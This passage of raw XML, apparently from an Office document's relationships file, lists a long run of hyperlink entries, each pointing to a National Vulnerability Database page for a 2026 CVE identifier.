Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52767" TargetMode="External" Id="rId562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53501" TargetMode="External" Id="rId563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53938" TargetMode="External" Id="rId564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62673" TargetMode="External" Id="rId565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63135" TargetMode="External" Id="rId566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63376" TargetMode="External" Id="rId567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63407" TargetMode="External" Id="rId568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64380" TargetMode="External" Id="rId569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69247" TargetMode="External" Id="rId570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69820" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69874" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73214" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73658" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73666" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75594" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77822" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82586" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84370" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85596" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86253" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88032" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89054" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18147" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19303" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19594" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33997" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44745" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46099" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48081" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54330" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65181" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70465" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70468" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71407" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72903" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73334" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80354" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81268" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81891" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87016" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87457" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87467" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87509" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87530" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87554" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87874" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87958" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47858" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48080" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52833" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84935" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43133" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44629" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12410" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16826" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17499" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17523" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19820" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2310" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30512" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34398" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34399" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45998" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46117" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46145" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46189" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52987" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53000" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 